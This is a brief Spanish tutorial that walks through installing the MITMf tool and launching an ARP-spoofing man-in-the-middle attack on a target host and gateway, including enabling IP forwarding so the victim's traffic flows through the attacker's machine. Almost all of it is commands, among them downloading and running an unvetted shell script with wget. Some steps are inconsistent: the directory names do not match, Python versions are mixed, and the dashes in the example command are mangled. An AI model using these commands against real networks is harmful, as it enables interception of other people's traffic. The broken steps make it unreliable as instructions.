Para utilizar la herramienta MITMf, primero debemos instalarla, para ello, abrimos nuestro terminal y escribimos:

1- Iniciamos instalando pip2

wget https://gist.githubusercontent.com/anir0y/a20246e26dcb2ebf1b44a0e1d989f5d1/raw/a9908e5dd147f0b6eb71ec51f9845fafe7fb8a7f/pip2%2520install -O run.sh

chmod +x run.sh

./run.sh

2- Instalando todas las dependencias

sudo apt update && sudo apt upgrade

pip install setuptools

sudo apt install python2-dev libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone4 libcapstone-dev libffi-dev file

***git clone https://github.com/Radeonares32/MITMF.git***

3- Iniciar MITMf

cd MITMf

sudo python3 mitmf.py -h

Para ejecutarlo, utilizamos el siguiente comando:

mitmf –arp –spoof -i [interface] –target [client IP] –gateway [gateway IP]

Ejemplo:  mitmf  – -arp  – – spoof -i eth0  – – target 10.0.2.4  – -gateway 10.0.2.1

Nota: Cada vez que realizamos un ataque MITM, no debemos olvidar ejecutar el comando de reenvío de puerto en la terminal. Este comando permite que el tráfico de la red fluya a través del equipo del atacante.

Ejemplo: echo 1 > /proc/sys/net/ipv4/ip_forward